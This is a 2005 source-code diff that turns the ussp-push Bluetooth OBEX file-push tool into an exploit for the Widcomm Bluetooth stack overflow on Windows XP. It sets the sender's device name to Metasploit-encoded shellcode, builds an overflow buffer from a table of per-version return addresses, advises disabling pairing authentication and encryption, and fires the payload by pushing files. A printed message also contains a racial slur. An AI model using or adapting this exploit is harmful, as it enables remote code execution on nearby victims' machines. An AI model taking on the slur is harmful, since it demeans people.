--- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
 /*
+   http://www.digitalmunition.com
+   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
+   http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
  * UNrooted.net example code
  *
  * Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@
 
 #include "obex_socket.h"
 
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
 #define BT_SERVICE "OBEX"
 #define OBEX_PUSH        5
 
@@ -316,6 +325,9 @@
 	switch (event)  {
         case OBEX_EV_PROGRESS:
 		printf("Made some progress...n");
+		sleep(3);
+		printf("Peace nigga...n");
+		exit(0);
 		break;
 
         case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
 	name = remote;
 
 	name_len = (strlen(name)+1)<<1;
-	if( (namebuf = g_malloc(name_len)) )    {
-		OBEX_CharToUnicode(namebuf, name, name_len);
-	}
+	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
 
 	buf = easy_readfile(path, &file_size);
 	if(buf == NULL) {
@@ -424,6 +434,24 @@
 	return err;
 }
 
+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
+{
+         int s = hci_open_dev(hdev);
+
+         if (s < 0) {
+                 fprintf(stderr, "Can't open device hci%d: %s (%d)n",
+                                                 hdev, strerror(errno), errno);
+                 exit(1);
+         }
+         if (opt) {
+                 if (hci_write_local_name(s, opt, 2000) < 0) {
+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)n",
+                                                 hdev, strerror(errno), errno);
+                         exit(1);
+                 }
+	}
+
+}
 
 /*
  * That's all there is to it.  With it all setup like this all I have to do
@@ -434,19 +462,87 @@
 
 int main( int argc, char **argv )
 {
-	if ( argc != 4 ) {
-		printf("%snn"
-		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILEnn"
-		       "tDEVICE        = RFCOMM TTY device filen"
-		       "tBTADDR@BTCHAN = BlueTooth address/name and OBEX channeln"
-		       "tLFILE         = Local file pathn"
-		       "tRFILE         = Remote file namenn",
-		       UPUSH_APPNAME, argv[0]);
+/* 
+	The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+       # Authentication and Encryption (Security Mode 3)
+        auth disable;
+        encrypt disable;
+*/
+
+	struct
+	{
+  		char *os;
+  		u_long ret;
+	}
+ 	targets[] =
+ 	{
+  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+  		{ "[ Crash ]", 0x41424344 },
+	}, v;
+
+	if ( argc != 3 ) {
+		printf("%snUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILEnntDEVICE        = RFCOMM TTY device filentBTADDR@BTCHAN = BlueTooth address/name and OBEX channelntTARGET 	= Target numbern",UPUSH_APPNAME,argv[0]);
+		printf("Types:n");
+		int i;
+  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+  		printf("%d [0x%.8x]: %sn", i, targets[i].ret, targets[i].os);
+
 		return( -1 );
 	}
 
-	printf( "pushing file %sn", argv[2] );
-	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
+	/* this still crashes the BTStackServer.exe... but oh well */
+	unsigned char scode[] = 
+	"x2bxc9xdaxcdxd9x74x24xf4x5fxb1x33xb8xd1xf7x19xb7"
+	"x31x47x15x83xc7x04x03x96xe6xfbx42xe4x38x3cxc8x9f"
+	"x7bx8cx9axdfx77x67xecxc3x2axfcx65xf3x5cx6fx1ax03"
+	"x9dx07xd1x31xb3xb3x7dx40xb8x5ex0cxfex85xd0x57x16"
+	"x07xfaxcexe6xf8xfbx67x09x71x3ex46x07xd0x29xafxa7"
+	"xd5xa9xf3xe6x81xfaxc9xe8xc1xd8x2dxe8x11x62x62xa4"
+	"x31x3dx35x61x60x9dx8bxc5xd1x98x5fx9ax96x76x28x04"
+	"x68x25xedx64x28x8cxa1x2bxe2x49x1axe7xb5x75x0fx54"
+	"x64x76xfdxe1x9ax7axc8xefxb3x8cxcax0fx44xa2x0ax5f"
+	"xcdx39x31x36xd0x83x7cx20xeax03x81xb0xbdx54x0axf5"
+	"x7dxd0x58xf0x05xe7x8axa8x7exb5x6ax4dx6bx0bxabx7c"
+	"xa2x2dxa0x4axbexafx58x83x41x6ex6bxf0x11x70xb3x73"
+	"xa9x06xcdx42xf5x9cxdbxeex82x05x38x0fx7exdfxcbx03"
+	"xcbxabx96x07xcax40xadx33x47x97x5ax64x09x67x7ax9a";
+	
+	set_device_name(0,0,scode);
+	//printf("RENAME DONE: SET NEW NAME TO %sn",scode);
+	//printf( "pushing file.n");
+
+	char buf[3000];
+	memset(buf,'',sizeof(buf));
+	memset(buf,'Z',3); // Sometimes u need 3 z's 
+
+        int type = atoi(argv[2]);
+        if(type)
+        {
+        	printf("[-] Selected target:n");
+              	printf("    %d [0x%.8x]: %sn", type, targets[type].ret, targets[type].os);              
+        }
+
+	int x;
+	for(x=0; x<=122; x=x+1)
+	{
+    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+	}
+	// Populate HKEY_LOCAL_MACHINESOFTWAREWidcommBTConfigDevices<bdaddr>Name with shellcode
+	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+		printf( "errorn" );
+		return( -1 );
+	}
+	printf("nsleeping 3 seconds before triggering the shellcoden"); 
+	sleep(3);
+	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
 		printf( "errorn" );
 		return( -1 );
 	}

// www.Syue.com [2005-12-04]